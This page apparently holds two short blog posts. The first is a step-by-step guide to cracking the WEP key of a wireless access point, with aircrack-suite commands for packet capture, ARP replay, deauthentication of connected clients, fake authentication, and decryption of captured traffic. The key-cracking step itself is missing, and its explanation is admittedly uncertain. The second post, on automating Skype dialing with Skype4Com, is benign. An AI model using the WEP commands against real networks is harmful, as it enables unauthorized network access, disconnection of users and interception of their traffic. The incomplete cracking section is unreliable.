WEP Cracking


If you want to crack WEP keys of an AP that is using WEP.

The following steps should be performed:

Start Capturing packets first:
sudo airodump-ng –bssid <APMAC> -w <CAPTUREFILE> –channel <CHANNELNUM> <IFACE>

Start capturing ARP packets:
sudo aireplay-ng –arpreplay -e <ESSID> -b <APMAC> -h <ASSOCIATEDCLIENTMAC> <IFACE>

Send deauth packets:
sudo aireplay-ng –deauth 5 -a <APMAC> -c <ASSOCIATEDCLIENTMAC> -e <ESSID> <IFACE>

Send fakeauth packets:
sudo aireplay-ng –fakeauth 5 -e <ESSID> -b <APMAC> -h <ASSOCCLIENTMAC> <IFACE>

Cracking WEP:

The fudge factor is a measure of how much randomness to check for. I am not exactly sure of its cryptographic significance, however, it may make the difference between cracking a WEP key and not.

Sometimes you may have an AP with no clients connected to it. In such cases, follow the instructions at the following URL:
How to crack WEP with no clients.

Once the WEP keys are obtained then use airdecap-ng to decrypt the packets:
airdecap-ng -b <APMAC> -e <ESSID> -w <KEY> <PCAPFILE>
tcpdump -r <PCAPFILE>-dec.cap


Skype4Com API to script skype


I came across the interesting Skype4Com API that could aid users to dial several numbers using skype.
To install Skype4Com simply unzip the contents of the archive and execute the following command:

c:\> regsvr32 Skype4Com.dll

Upon executing this you can use the Skype4Com API using .Net (C#, VB Script) and even Python.
One can even generate DTMF tones to dial in to 1-800-numbers and automate the process so you can directly get through the initial wait times and directly speak to the customer representative.